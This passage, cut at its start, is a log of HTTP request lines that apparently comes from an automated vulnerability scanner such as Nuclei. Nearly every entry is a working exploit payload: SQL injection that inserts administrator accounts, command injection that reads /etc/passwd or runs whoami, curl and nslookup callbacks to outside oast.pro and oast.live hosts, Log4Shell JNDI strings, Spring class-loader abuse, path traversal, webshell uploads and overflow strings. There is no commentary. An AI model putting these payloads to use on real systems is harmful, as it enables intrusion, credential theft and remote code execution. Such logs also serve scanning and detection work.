272xHOdATq4OFd4vbqu3GjR9cM47p%27;UPDATE+activesessions+SET+AcctReady=%271%27+WHERE+SessionID=%272xHOdATq4OFd4vbqu3GjR9cM47p%27%23 HTTP/1.1
758	2	DELETE /app/rest/users/id:1/tokens/RPC2 HTTP/1.1
759	2	GET /?–configPath=/nuclei_test/5496176043 HTTP/1.1
761	2	GET /seeyon/test123456.jsp?pwd=asasd3344&2xHOdIX4J95V3AYUZmUkU8WAh4H=ipconfig HTTP/1.1
765	2	GET /0aElmJ HTTP/1.1
766	2	GET /?–configPath=/nuclei_test/5251420073 HTTP/1.1
769	2	POST /modules/appagebuilder/apajax.php?rand=658591888495 HTTP/1.1
771	2	GET /authenticationendpoint/2xhodj73a9arbbjlk32nselqg5v.jsp HTTP/1.1
773	2	GET /2xHOXSPeNq7ehKb9Nc8pxzfgMb0.jsp HTTP/1.1
774	2	POST /modules/appagebuilder/apajax.php?rand=1257207146634 HTTP/1.1
775	2	POST /modules/appagebuilder/apajax.php?rand=9018925475378 HTTP/1.1
776	2	GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3Eghxn.txt HTTP/1.1
777	2	GET /authenticationendpoint/2xhoxaqu7tjeaddmyp5kylz7j0i.jsp HTTP/1.1
778	2	GET /wp-content/uploads/html2wp/2xHOd836v385lbFmlYbk7bbJgoA.php HTTP/1.1
779	2	GET /api/2xHOXdOgfqAblfFZ49N0Q7V2lkU HTTP/1.1
781	2	POST /modules/appagebuilder/apajax.php?rand=3334100375197 HTTP/1.1
783	2	POST /app/rest/users/id:1/tokens/2xHOctApTocXWtG7QRCqz8Bn4DQ;.jsp?jsp_precompile=true HTTP/1.1
784	2	GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20d0l23ge3tjmd51ltm35gycinwakpbwfep.oast.pro HTTP/1.1
785	2	GET /qvisdvr/ HTTP/1.1
786	2	POST /forms/doLogin HTTP/1.1
787	2	POST /login/userverify.cgi HTTP/1.1
788	2	POST /auth/token HTTP/1.1
789	2	GET /7vJVKl HTTP/1.1
790	2	GET /L2dfs/CVE-2023-47246.txt?true HTTP/1.1
791	2	POST /management/export.php?filename=$(echo+’’+>+tkffudbpycxw.php)&type=pdf HTTP/1.1
792	2	POST /actuator/gateway/routes/2xHOciW0d1yOqq4dmOHvrp9qN4p HTTP/1.1
795	2	GET /item/list?draw=1&order%5B0%5D%5Bcolumn%5D=1&order%5B0%5D%5Bdir%5D=desc)a+union+select+updatexml(1,concat(0x7e,c853b069232c97070cae0e9eaf8e88c8,0x7e),1)%23;&start=0&length=1&search%5Bvalue%5D&search%5Bregex%5D=false&cid=-1&_=1 HTTP/1.1
796	2	POST /app/rest/users/id:1/tokens/2xHOXjLNhufnhflxya3wjgjbsYi;.jsp?jsp_precompile=true HTTP/1.1
797	2	GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20d0l235hfbd6ifhi9kb1gkdsz53w9yj6zj.oast.live HTTP/1.1
798	2	GET /wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=ftp://d0l23ge3tjmd51ltm35ge6m6ydu4t3fcd.oast.pro/patrowl.svg HTTP/1.1
807	2	GET /service-worker.js?local_access_token=2xHOd3PwZ3TrVXJ9CJlvDhQRjSh HTTP/1.1
808	2	GET /api/cors/http:%2f%2fnextchat.d0l23ge3tjmd51ltm35gb7oe8tmda1r8c.oast.pro%23 HTTP/1.1
809	2	POST /userentry?accountId=/../../../tomcat/webapps/v2arI/&symbolName=test&base64UserName=YWRtaW4= HTTP/1.1
810	2	GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/T(java.lang.Runtime).getRuntime().exec(new%20java.lang.String(T(java.util.Base64).getDecoder().decode(%22bnNsb29rdXAgZDBsMjM1aGZiZDZpZmhpOWtiMWdmenJidTd3cXB6a3o1Lm9hc3QubGl2ZQ==%22))) HTTP/1.1
815	2	POST /wp-admin/admin-ajax.php?+config-create+/&/+/tmp/2xHOdBrH05fnxDJomu09dlQ14F7.php HTTP/1.1
816	2	GET /wp-content/plugins/wp-file-upload/wfu_file_downloader.php?file=4vCtpxaz6r5LA9wj&ticket=IZmP6xND00O05Mgt&handler=dboption&session_legacy=1&dboption_base=cookies&dboption_useold=0&wfu_cookie=wp_wpfileupload_XL3hVQgQevAfr56KiCpVzhUvkPGtZN1u HTTP/1.1
817	2	GET /C1X63x.txt?true HTTP/1.1
818	2	POST /userentry?accountId=/../../../tomcat/webapps/L2dfs/&symbolName=test&base64UserName=YWRtaW4= HTTP/1.1
819	2	GET /home/xlgrl.php HTTP/1.1
820	2	GET /model-versions/get-artifact?path=random&name=ZzdqNE&version=2 HTTP/1.1
821	2	GET /wp-json/lp/v1/load_content_via_ajax/?callback={\x22class\x22%3a\x22LP_Debug\x22,\x22method\x22%3a\x22var_dump\x22}&args=\x222xHOdAiAi3hGzbas8lU6k9sTE07\x22 HTTP/1.1
822	2	GET /workflow/servlet/pdf_servlet?JOBID=1%27%3BINSERT+INTO+DOCTERA_USERS+%28USERNAME%2C+PASSWORD%2C+ENCPASSWORD%2C+FIRSTNAME%2C+LASTNAME%2C+COMPANY%2C+ADDRESS%2C+ADDRESS2%2C+CITY%2C+STATE%2C+ALTPHONE%2C+ZIP%2C+COUNTRY%2C+PHONE%2C+FAX%2C+EMAIL%2C+LASTLOGIN%2C+CREATION%2C+PREFERREDSERVER%2C+CREDITCARDTYPE%2C+CREDITCARDNUMBER%2C+CREDITCARDEXPIRY%2C+ACCOUNTSTATUS%2C+USERTYPE%2C+COMMENT%2C+ADMIN%2C+SUPERADMIN%2C+ACCEPTEMAIL%2C+ALLOWHOTFOLDER%2C+PROTOCOL%2C+BANDWIDTH%2C+DIRECTORY%2C+SLOWSTARTRATE%2C+USESLOWSTART%2C+SLOWSTARTAGGRESSIONRATE%2C+BLOCKSIZE%2C+UNITSIZE%2C+NUMENCODERS%2C+NUMFTPSTREAMS%2C+ALLOWUSERBANDWIDTHTUNING%2C+EXPIRYDATE%2C+ALLOWTEMPACCOUNTCREATION%2C+OWNERUSERNAME%2C+USERLEVEL%2C+UPLOADMETHOD%2C+PW_CHANGEABLE%2C+PW_CREATIONDATE%2C+PW_DAYSBEFOREEXPIRE%2C+PW_MUSTCHANGE%2C+PW_USEDPASSWORDS%2C+PW_NUMERRORS%29+VALUES%28%272xhocqtucm8ru4emd5ok87klcwt%27%2C+NULL%2C+%270629F56FF1EB7BFB874CDE61492D41F9%27%2C+%272xhocqtucm8ru4emd5ok87klcwtFirstName%27%2C+%272xhocqtucm8ru4emd5ok87klcwtLastName%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27202-404-2400%27%2C+%27%27%2C+%272xhocqtucm8ru4emd5ok87klcwt%40mydomain.local%27%2C+1714014839723%2C+1714013661166%2C+%27default%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27full+access%27%2C+%27%27%2C+%27%27%2C+1%2C+0%2C+0%2C+0%2C+%27DEFAULT%27%2C+%270%27%2C+0%2C+%270%27%2C+1%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+0%2C+0%2C+0%2C+%27%27%2C+0%2C+%27DEFAULT%27%2C+0%2C+1714014752270%2C+-1%2C+0%2C+NULL%2C+0%29%3B–+- HTTP/1.1
823	2	PATCH /mgmt/tm/auth/user/T0XCr HTTP/1.1
824	2	GET /?class.module.classLoader.resources.context.configFile=https://d0l235hfbd6ifhi9kb1gcnc4bj4szwboy.oast.live&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1
825	2	POST /actuator/gateway/routes/2xHOXnxsx9r2UrUyuyrKqkjoQTJ HTTP/1.1
826	2	GET /%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20d0l235hfbd6ifhi9kb1g35f1rtjtm4149.oast.live%22%29%7D/ HTTP/1.1
827	2	GET /2xHOXRxV2z1uwvxxGOqv0uh3tMc HTTP/1.1
828	2	GET /cgi-bin/downloadFlile.cgi?payload=`ls>../2xHOXRxV2z1uwvxxGOqv0uh3tMc` HTTP/1.1
829	2	GET /wp-content/uploads/kaswara/fonts_icon/itpwjr/lk.php HTTP/1.1
830	2	GET /icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd HTTP/1.1
831	2	GET /elFinder/php/connector.minimal.php?cmd=mkfile&target=l1_Lw&name=2xHOXPvBh2vHkwo2xBi6IxC4wet.php:aaa HTTP/1.1
832	2	GET /icons/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1
833	2	GET /v1/2xHOXkzmHPS7jpKOCj9QHKeFuH9.php HTTP/1.1
834	2	GET /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath=2xHOd9BAIyZmgin7F0AgY5Lp2Oi.php HTTP/1.1
835	2	DELETE /images/icons_title.gif HTTP/1.1
836	2	POST /wp-admin/admin-ajax.php?action=cfom_upload_file&name=2xHOd9ADLN433rnZnhkDrKzgGYs.pHp HTTP/1.1
837	2	GET /?x=${jndi:ldap://${:-156}${:-327}.${hostName}.uri.d0l235hfbd6ifhi9kb1gpuxg5fqrjy4t5.oast.live/a} HTTP/1.1
838	2	GET /elFinder/php/connector.minimal.php?cmd=mkfile&target=l1_Lw&name=2xHOd7tND9eVSztaLse1IFjWKwS.php:aaa HTTP/1.1
839	2	GET /objects/getSpiritsFromVideo.php?base64Url=YGlkID4gemdxZ3EudHh0YA===&format=jpg HTTP/1.1
840	2	POST /wp-content/plugins/wpcargo/includes/2xHOd9BAIyZmgin7F0AgY5Lp2Oi.php?1=var_dump HTTP/1.1
841	2	GET /2xHOch9xCHZNbrYKT5YFKoq9tQy.php?cmd=sudo+rpm+–eval+’%25{lua%3aos.execute(\x22curl+http%3a//d0l23ge3tjmd51ltm35g5uzkz9fifs6yw.oast.pro+-H+‘User-Agent%3a+x5bpOr’\x22)}’ HTTP/1.1
843	2	GET /admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name=2xHOdFVm6YrFEjxD5m54jUwNmEs.php&target=l1_Lw HTTP/1.1
844	2	GET /wp-content/uploads/html2wp/2xHOXUUNK0lq20AX6bAxj9QWBbS.php HTTP/1.1
846	2	POST /lucee/admin/imgProcess.cfm?file=/../../../context/2xHOcoFQucyXG4pRs5W7ZpISUJv.cfm HTTP/1.1
847	2	GET /admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name=2xHOXeFc8Bk27ZV1tg012JUBI37.php&target=l1_Lw HTTP/1.1
848	2	GET /wp-content/plugins/wpcargo/includes/2xHOd9BAIyZmgin7F0AgY5Lp2Oi.php HTTP/1.1
849	2	GET /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bcurl,http://d0l23ge3tjmd51ltm35gc9qewbatk41h4.oast.pro+-H+%27User-Agent:+OqNYJd%27%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bcurl,http://d0l23ge3tjmd51ltm35gsn6xs9j4kfopm.oast.pro+-H+%27User-Agent:+OqNYJd%27%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1
850	2	GET /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bcurl,http://d0l23ge3tjmd51ltm35gq7dkc9wmyh5jp.oast.pro+-H+%27User-Agent:+OqNYJd%27%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bcurl,http://d0l23ge3tjmd51ltm35gmnuugkrdrabqa.oast.pro+-H+%27User-Agent:+OqNYJd%27%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1
851	2	GET /getsamplebacklog?arg1=2d0ows2x9anpzaorxi9h4csmai08jjor&arg2=%7b%22type%22%3a%22client%22%2c%22earliest%22%3a%221676976316.328%7c%7cnslookup%20%24(xxd%20-pu%20%3c%3c%3c%20%24(whoami)).d0l235hfbd6ifhi9kb1gjskc8pqo8iyoz.oast.live%7c%7cx%22%2c%22latest%22%3a1676976916.328%2c%22origins%22%3a%5b%7b%22ip%22%3a%22xxx.xxx.xxx.xxx:80%22%2c%22source%22%3a0%7d%5d%2c%22seriesID%22%3a3%7d&arg3=undefined&arg4=undefined&arg5=undefined&arg6=undefined&arg7=undefined HTTP/1.1
852	2	POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.d0l23ge3tjmd51ltm35g8hmpdjphbqmsj.oast.pro) HTTP/1.1
853	2	GET /bypass/config?type=sqs&keyId=test&key=security&queueUrl=http://d0l235hfbd6ifhi9kb1gi7qkpzc3mszp9.oast.live/ HTTP/1.1
854	2	GET /wp-content/uploads/cfom_files/2xhod9adln433rnznhkdrkzggys.php HTTP/1.1
855	2	GET /v1/2xHOcuujUrHyt5XfeDV1LEI3pma.php HTTP/1.1
856	2	GET /api/2xHOcvV0k39SpwWLq7nq4m6sdv0 HTTP/1.1
857	2	POST /wp-admin/admin-ajax.php?action=cfom_upload_file&name=2xHOXU7KmjergPySF6SLKTSyWhc.pHp HTTP/1.1
858	2	POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.d0l235hfbd6ifhi9kb1g5jb4anftb37uh.oast.live) HTTP/1.1
859	2	GET /2xHOdJILg9aHNSIx9cgEXIjBEJj.jsp HTTP/1.1
860	2	GET /wp-content/uploads/cfom_files/2xhoxu7kmjergpysf6slktsywhc.php HTTP/1.1
862	2	GET /?class.module.classLoader.resources.context.configFile=https://d0l23ge3tjmd51ltm35gz3ipezjzzeshy.oast.pro&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1
863	2	GET /?class.module.classLoader.resources.context.configFile=http://d0l23ge3tjmd51ltm35gpmnu48aqh7bm3.oast.pro&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1
864	2	GET /cgi-bin/downloadFlile.cgi?payload=`ls>../2xHOcspC7Pkjf16Led29gYHj0Om` HTTP/1.1
865	2	GET /2xHOcspC7Pkjf16Led29gYHj0Om HTTP/1.1
866	2	GET /%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20d0l23ge3tjmd51ltm35gecjg5bcdyoeaw.oast.pro%22%29%7D/ HTTP/1.1
867	2	POST /wp-admin/admin-ajax.php?0=MnhIT2RHMnZKYnZta3lPaFNXNktXOVBQTGd6 HTTP/1.1
869	2	GET /crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&charset=utf-8&includeVersions=true HTTP/1.1
870	2	GET /item/list?draw=1&order%5B0%5D%5Bcolumn%5D=1&order%5B0%5D%5Bdir%5D=desc)a+union+select+updatexml(1,concat(0x7e,79c1c71738d9417138ecbae4f17be6e7,0x7e),1)%23;&start=0&length=1&search%5Bvalue%5D&search%5Bregex%5D=false&cid=-1&_=1 HTTP/1.1
871	2	GET /?class.module.classLoader.resources.context.configFile=http://d0l235hfbd6ifhi9kb1g6fizhubk594zy.oast.live&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1
872	2	POST /modules/appagebuilder/apajax.php?rand=2494282919022 HTTP/1.1
873	2	POST /modules/appagebuilder/apajax.php?rand=9625910307812 HTTP/1.1
874	2	GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/T(java.lang.Runtime).getRuntime().exec(new%20java.lang.String(T(java.util.Base64).getDecoder().decode(%22bnNsb29rdXAgZDBsMjNnZTN0am1kNTFsdG0zNWc1d25lZGt1b2l0d2ozLm9hc3QucHJv%22))) HTTP/1.1
875	2	PUT /api/v2/cmdb/system/admin/admin HTTP/1.1
876	2	GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=0&cache2xHOXYtYwnftBTZvX5XxVTpfxf1 HTTP/1.1
877	2	GET /forms/doLogin?login_username=admin&password=password$(curl%20d0l235hfbd6ifhi9kb1grwk36r81tqf4i.oast.live)&x=0&y=0 HTTP/1.1
878	2	PUT /wp-json/seopress/v1/posts/1/title-description-metas HTTP/1.1
880	2	GET /workflow/servlet/pdf_servlet?JOBID=1%27%3BINSERT+INTO+DOCTERA_USERS+%28USERNAME%2C+PASSWORD%2C+ENCPASSWORD%2C+FIRSTNAME%2C+LASTNAME%2C+COMPANY%2C+ADDRESS%2C+ADDRESS2%2C+CITY%2C+STATE%2C+ALTPHONE%2C+ZIP%2C+COUNTRY%2C+PHONE%2C+FAX%2C+EMAIL%2C+LASTLOGIN%2C+CREATION%2C+PREFERREDSERVER%2C+CREDITCARDTYPE%2C+CREDITCARDNUMBER%2C+CREDITCARDEXPIRY%2C+ACCOUNTSTATUS%2C+USERTYPE%2C+COMMENT%2C+ADMIN%2C+SUPERADMIN%2C+ACCEPTEMAIL%2C+ALLOWHOTFOLDER%2C+PROTOCOL%2C+BANDWIDTH%2C+DIRECTORY%2C+SLOWSTARTRATE%2C+USESLOWSTART%2C+SLOWSTARTAGGRESSIONRATE%2C+BLOCKSIZE%2C+UNITSIZE%2C+NUMENCODERS%2C+NUMFTPSTREAMS%2C+ALLOWUSERBANDWIDTHTUNING%2C+EXPIRYDATE%2C+ALLOWTEMPACCOUNTCREATION%2C+OWNERUSERNAME%2C+USERLEVEL%2C+UPLOADMETHOD%2C+PW_CHANGEABLE%2C+PW_CREATIONDATE%2C+PW_DAYSBEFOREEXPIRE%2C+PW_MUSTCHANGE%2C+PW_USEDPASSWORDS%2C+PW_NUMERRORS%29+VALUES%28%272xhoxsm1rycbhmj91hc9rfqlhet%27%2C+NULL%2C+%27F1538B0A399986FB25B78A8ACEC82A2E%27%2C+%272xhoxsm1rycbhmj91hc9rfqlhetFirstName%27%2C+%272xhoxsm1rycbhmj91hc9rfqlhetLastName%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27202-404-2400%27%2C+%27%27%2C+%272xhoxsm1rycbhmj91hc9rfqlhet%40mydomain.local%27%2C+1714014839723%2C+1714013661166%2C+%27default%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27full+access%27%2C+%27%27%2C+%27%27%2C+1%2C+0%2C+0%2C+0%2C+%27DEFAULT%27%2C+%270%27%2C+0%2C+%270%27%2C+1%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+0%2C+0%2C+0%2C+%27%27%2C+0%2C+%27DEFAULT%27%2C+0%2C+1714014752270%2C+-1%2C+0%2C+NULL%2C+0%29%3B–+- HTTP/1.1
881	2	GET /?x=${jndi:ldap://${:-768}${:-915}.${hostName}.uri.d0l23ge3tjmd51ltm35gearox1e1b73jt.oast.pro/a} HTTP/1.1
888	2	GET /service-worker.js?local_access_token=2xHOXjxc1pV69UgUDiC8ZDfEUVZ HTTP/1.1
889	2	POST /lucee/2xHOXg4D0vFpCEUi3NrYwVhqmBI.cfm HTTP/1.1
890	2	POST /lucee/admin/imgProcess.cfm?file=/../../../context/2xHOXg4D0vFpCEUi3NrYwVhqmBI.cfm HTTP/1.1
891	2	GET /wp-content/uploads/workreap-temp/2xHOXU8oW77BTg41NuM7aufenON.php HTTP/1.1
892	2	GET /assets/data/usrimg/2xhocln0mordjcb13a0zxzu2qnn.php HTTP/1.1
893	2	GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/2xHOXXzyruQlyfOp2k6bHeLvw7T.txt HTTP/1.1
894	2	GET /objects/zgqgq.txt HTTP/1.1
895	2	GET /include/makecvs.php?Event=%60curl+http%3a//d0l235hfbd6ifhi9kb1godyqrikp5feua.oast.live+-H+‘User-Agent%3a+y9WbYE’%60 HTTP/1.1
896	2	GET /HlhdtQMWtQ.txt HTTP/1.1
897	2	GET /resources/qmc/fonts/CVE-2023-41265.ttf HTTP/1.1
898	2	GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=0&cache2xHOd95oZxxNrDzySHJ1RnPXpPJ HTTP/1.1
899	2	GET /objects/lznnb.txt HTTP/1.1
900	2	GET /talari/app/files/2xHOd8k3N2BafQuJsML6sbDy47B HTTP/1.1
901	2	GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20WSgDScgHdA.txt%60 HTTP/1.1
902	2	GET /file/mB0mIt.txt HTTP/1.1
903	2	GET /objects/getSpiritsFromVideo.php?base64Url=YGlkID4gbHpubmIudHh0YA===&format=jpg HTTP/1.1
904	2	GET /sap/admin/public/default.html HTTP/1.1
905	2	GET /webadmin/script?command=
906	2	GET /objects/getImage.php?base64Url=YGlkID4gemdxZ3EudHh0YA===&format=png HTTP/1.1
907	2	GET /objects/getImageMP4.php?base64Url=YGlkID4gemdxZ3EudHh0YA===&format=jpg HTTP/1.1
908	2	GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20HlhdtQMWtQ.txt%60 HTTP/1.1
909	2	POST /models?url=http%3a//d0l235hfbd6ifhi9kb1giokaxrw18o4sx.oast.live HTTP/1.1
910	2	GET /2xHOcxpITp7ixGbx3rneL5M7Rpw HTTP/1.1
911	2	GET /bypass/config?type=sqs&keyId=test&key=security&queueUrl=http://d0l23ge3tjmd51ltm35gzz715kye1aptz.oast.pro/ HTTP/1.1
912	2	GET /tos/index.php?explorer/pathList&path=%60curl+http%3a//d0l235hfbd6ifhi9kb1gt8wbkt7sbffqd.oast.live+-H+‘User-Agent%3a+y9WbYE’%60 HTTP/1.1
913	2	GET /talari/app/files/2xHOXrf9Kd4FrB0GWuvcOtlKAGi HTTP/1.1
914	2	GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/2xHOcuvQy1fTOdqHdYapPkDNmer.jsp HTTP/1.1
915	2	GET /Uploads/2xHOcqdDg83oklvtFmTdFMRhPaN.php7 HTTP/1.1
916	2	GET /fileserver/2xHOd9J78X8NWD8TY3fw0z3ZEv8.txt HTTP/1.1
917	2	GET /objects/getImage.php?base64Url=YGlkID4gbHpubmIudHh0YA===&format=png HTTP/1.1
918	2	GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://d0l235hfbd6ifhi9kb1gmqptczf8gqe1p.oast.live%23 HTTP/1.1
919	2	GET /objects/getImageMP4.php?base64Url=YGlkID4gbHpubmIudHh0YA===&format=jpg HTTP/1.1
920	2	GET /public/css/2xHOXMdhA7JSI4msH4oqnucMJ9E.css HTTP/1.1
921	2	GET /getsamplebacklog?arg1=2d0ows2x9anpzaorxi9h4csmai08jjor&arg2=%7b%22type%22%3a%22client%22%2c%22earliest%22%3a%221676976316.328%7c%7cnslookup%20%24(xxd%20-pu%20%3c%3c%3c%20%24(whoami)).d0l23ge3tjmd51ltm35gbkg5kcdcsdq7i.oast.pro%7c%7cx%22%2c%22latest%22%3a1676976916.328%2c%22origins%22%3a%5b%7b%22ip%22%3a%22xxx.xxx.xxx.xxx:80%22%2c%22source%22%3a0%7d%5d%2c%22seriesID%22%3a3%7d&arg3=undefined&arg4=undefined&arg5=undefined&arg6=undefined&arg7=undefined HTTP/1.1
922	2	GET /sap/public/bc/ur/Login/assets/corbu/sap_logo.png HTTP/1.1
924	2	GET /2xHOXoHdKXYZsapY4ZlEiKen6jr.php?cmd=sudo+rpm+–eval+’%25{lua%3aos.execute(\x22curl+http%3a//d0l235hfbd6ifhi9kb1gag4cn1he1n9qn.oast.live+-H+‘User-Agent%3a+3GI5Ii’\x22)}’ HTTP/1.1
926	2	GET /wp-content/uploads/workreap-temp/2xHOcpl4I93veGTWLe6QFEF2TE8.php HTTP/1.1
927	2	GET /wp-content/uploads/kaswara/fonts_icon/stlogp/kz.php HTTP/1.1
928	2	GET /tos/index.php?explorer/pathList&path=%60curl+http%3a//d0l23ge3tjmd51ltm35gd4wuq7xb4qit6.oast.pro+-H+‘User-Agent%3a+Af2WOo’%60 HTTP/1.1
929	2	GET /file/wTgQck.txt HTTP/1.1
930	2	GET /include/makecvs.php?Event=%60curl+http%3a//d0l23ge3tjmd51ltm35ghw68humgae4s8.oast.pro+-H+‘User-Agent%3a+Af2WOo’%60 HTTP/1.1
931	2	GET /wp-content/plugins/imagements/images/2xhoxldt5fjmqm3sp5zxfj5iaes.php HTTP/1.1
932	2	GET /public/css/2xHOdH36rk4vmhkFkKfnunE4ycK.css HTTP/1.1
933	2	GET /_images/iLD1QY HTTP/1.1
934	2	GET /2xHOXpKsDXe0w3NybhpuSMkChmF.jsp HTTP/1.1
935	2	GET /wp-content/plugins/wpcargo/includes/2xHOXQBkXSlbvkxZlepk4xHDX2B.php HTTP/1.1
936	2	GET /upload/userfiles/image/2xHOdD71xwj07Zo8MkWhUUQAiFT.png HTTP/1.1
937	2	GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3Ewaay.txt HTTP/1.1
938	2	GET /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bcurl,http://d0l235hfbd6ifhi9kb1gbmqq9xej8on35.oast.live+-H+%27User-Agent:+fyQPB3%27%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bcurl,http://d0l235hfbd6ifhi9kb1gmuwfe4cmeod64.oast.live+-H+%27User-Agent:+fyQPB3%27%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1
